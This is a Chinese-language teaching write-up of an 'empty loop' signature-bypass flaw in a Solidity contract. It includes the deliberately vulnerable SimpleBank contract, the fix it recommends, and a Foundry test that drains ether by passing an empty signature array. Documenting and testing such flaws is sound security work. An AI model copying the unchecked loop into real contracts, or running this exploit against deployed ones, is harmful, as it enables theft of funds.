名称:空循环问题
solidityproject/vulnerable-defi at master · XuHugo/solidityproject · GitHub
描述:
由于验证不充分,攻击者只需传递一个空数组即可绕过循环和签名验证。
补救措施:
检查签名数量 require(sigs.length > 0, “No signatures provided”);
问题合约:
withdraw函数中for循环,是用来校验参数sigs的,但是如果有人传入一个空数组,那么就会直接跳过for循环的校验。
contract SimpleBank {
struct Signature {
bytes32 hash;
uint8 v;
bytes32 r;
bytes32 s;
}
function verifySignatures(Signature calldata sig) public {
require(
msg.sender == ecrecover(sig.hash, sig.v, sig.r, sig.s),
"Invalid signature"
);
}
function withdraw(Signature[] calldata sigs) public {
// Mitigation: Check the number of signatures
//require(sigs.length > 0, "No signatures provided");
for (uint i = 0; i < sigs.length; i++) {
Signature calldata signature = sigs[i];
// Verify every signature and revert if any of them fails to verify.
verifySignatures(signature);
}
payable(msg.sender).transfer(1 ether);
}
receive() external payable {}
}
Foundry的测试代码:
contract ContractTest is Test {
SimpleBank SimpleBankContract;
function setUp() public {
SimpleBankContract = new SimpleBank();
}
function testVulnSignatureValidation() public {
payable(address(SimpleBankContract)).transfer(10 ether);
address alice = vm.addr(1);
vm.startPrank(alice);
SimpleBank.Signature[] memory sigs = new SimpleBank.Signature[](0); // empty input
//sigs[0] = SimpleBank.Signature("", 0, "", "");
console.log(
"Before exploiting, Alice's ether balance",
address(alice).balance
);
SimpleBankContract.withdraw(sigs); // Call the withdraw function of the SimpleBank contract with empty sigs array as the parameter
console.log(
"Afer exploiting, Alice's ether balance",
address(alice).balance
);
}
receive() external payable {}
}